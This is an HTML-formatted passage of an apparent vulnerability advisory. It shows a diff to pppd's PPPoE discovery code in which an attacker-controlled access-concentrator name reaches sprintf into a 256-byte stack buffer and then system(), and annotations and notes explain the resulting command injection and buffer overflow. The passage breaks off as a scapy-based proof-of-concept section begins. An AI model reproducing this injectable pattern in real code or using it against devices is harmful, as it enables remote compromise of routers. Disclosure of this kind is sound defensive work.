data-line=\"crayon-58f7e28ed7cb6774754989-33\">33<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cb6774754989-34\">34<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cb6774754989-35\">35<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cb6774754989-36\">36<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cb6774754989-37\">37<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cb6774754989-38\">38<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cb6774754989-39\">39<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cb6774754989-40\">40<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cb6774754989-1\"><span class=\"crayon-v\">diff<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-e\">Nur <\/span><span class=\"crayon-v\">pppd<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">old<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">pppd<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">plugins<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">rp<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">pppoe<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">discovery<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-i\">c<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">pppd<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">pppd<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">plugins<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">rp<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">pppoe<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">discovery<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">c<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cb6774754989-2\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">pppd<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">old<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">pppd<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">plugins<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">rp<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">pppoe<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">discovery<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-i\">c<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-cn\">2012<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">02<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">07<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">18<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">35<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">27.000000000<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0800<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cb6774754989-3\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">++<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">pppd<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">pppd<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">plugins<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">rp<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">pppoe<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">discovery<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-i\">c<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-cn\">2012<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">02<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">13<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">14<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">12<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">00.093953000<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0800<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cb6774754989-4\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">@<\/span><span class=\"crayon-sy\">@<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">114<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">13<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">114<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">17<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">@<\/span><span class=\"crayon-sy\">@<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cb6774754989-5\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">PacketCriteria *<\/span><span class=\"crayon-v\">pc<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">PacketCriteria *<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">extra<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cb6774754989-6\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-e\">PPPoEConnection *<\/span><span class=\"crayon-v\">conn<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">pc<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">conn<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cb6774754989-7\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-t\">int<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cb6774754989-8\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&#8211;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cb6774754989-9\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-t\">char<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">cmd<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">256<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-c\">\/\/!# 256bytes fixed stack buffer<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cb6774754989-10\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-e\">memset<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">cmd<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-e\">sizeof<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">cmd<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cb6774754989-11\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-st\">switch<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">type<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cb6774754989-12\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-st\">case<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">TAG_AC_NAME<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cb6774754989-13\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">pc<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">seenACName<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cb6774754989-14\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">conn<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">printACNames<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cb6774754989-15\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">printf<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;Access-Concentrator: %.*sn&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">int<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">len<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">data<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cb6774754989-16\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cb6774754989-17\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-c\">\/*add by taliang@cisco.com @13\/02 2012 for tr69*\/<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cb6774754989-18\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-e\">sprintf<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">cmd<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;sysevent set wan_pppoe_acname %.*s&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">int<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-v\">len<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">data<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-c\">\/\/!# VU#2 stack buffer overwrite sprintf<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cb6774754989-19\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-e\">system<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">cmd<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-c\">\/\/!# VU#1 shell command injection<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cb6774754989-20\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">conn<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">acName<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&amp;&amp;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">len<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">strlen<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">conn<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">acName<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&amp;&amp;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cb6774754989-21\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">!<\/span><span class=\"crayon-e\">strncmp<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">char<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">data<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">conn<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">acName<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">len<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cb6774754989-22\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">pc<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">acNameOK<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cb6774754989-23\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">@<\/span><span class=\"crayon-sy\">@<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">514<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">6<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">518<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">8<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">@<\/span><span class=\"crayon-sy\">@<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cb6774754989-24\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-e\">PPPoEPacket <\/span><span class=\"crayon-v\">packet<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cb6774754989-25\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-t\">int<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">len<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cb6774754989-26\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cb6774754989-27\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-t\">char<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">cmd<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">256<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cb6774754989-28\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-e\">memset<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">cmd<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">sizeof<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">cmd<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cb6774754989-29\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-st\">do<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cb6774754989-30\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">BPF_BUFFER_IS_EMPTY<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cb6774754989-31\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">tv<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">tv_sec<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">timeout<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cb6774754989-32\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">@<\/span><span class=\"crayon-sy\">@<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">569<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">6<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">575<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">9<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">@<\/span><span class=\"crayon-sy\">@<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cb6774754989-33\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cb6774754989-34\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-c\">\/* Don&#8217;t bother with ntohs; we&#8217;ll just end up converting it back&#8230; *\/<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cb6774754989-35\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-v\">conn<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">session<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">packet<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">session<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cb6774754989-36\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-c\">\/*add by taliang@cisco.com @13\/02 2012 for tr69*\/<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cb6774754989-37\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">sprintf<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">cmd<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;sysevent set wan_pppoe_session_id %d&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">int<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">ntohs<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">conn<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">session<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cb6774754989-38\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">system<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">cmd<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cb6774754989-39\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cb6774754989-40\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-e\">syslog<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">LOG_INFO<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;PPP session is %d&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">int<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">ntohs<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">conn<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">session<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0066 seconds] -->  <\/p>\n<ol>\n<li>A 256 byte stack buffer cmd is allocated to build the shell command that stores the extracted acname for the firmwares environment.<\/li>\n<li><em>data<\/em> contains the acname of the attacker controlled PADO packet<\/li>\n<li><em>sysevent set wan_pppoe_acname<\/em> and is concatenated and stored in the 256 byte buffer.<\/li>\n<li>VU#2 &#8211; <em>sprint(cmd,fmt,arg,&#8230;)<\/em> does not limit the amount of bytes written to <em>cmd<\/em> and there is no length limitation or any check to prevent a buffer overwrite at this point. Therefore any <em>acname<\/em>&gt; 226 bytes will write past the 256 byte buffer <em>cmd<\/em> (mem. corruption, pot. rce)<\/li>\n<li>VU#1 &#8211; The concatenated command <em>sysevent set wan_pppoe_acname <\/em> is being passed to <em>system(cmd)<\/em>. There is no sanitation\/input validation. Therefore any <em>acname<\/em> containing shell operators <em>(;,||,&amp;&amp;,$(subshell),cmd,..)<\/em> will cause a shell command injection (rce).<\/li>\n<\/ol>\n<p><strong>Proof of Concept<\/strong><br \/> In order to run the Proof of Concept you should install scapy==2.3.1.<\/p>\n<p><u>Command Injection<\/u><br \/> Step 1: run the PoC.py providing the interface to listen on.<br \/> Note that the command to be injected is configured in 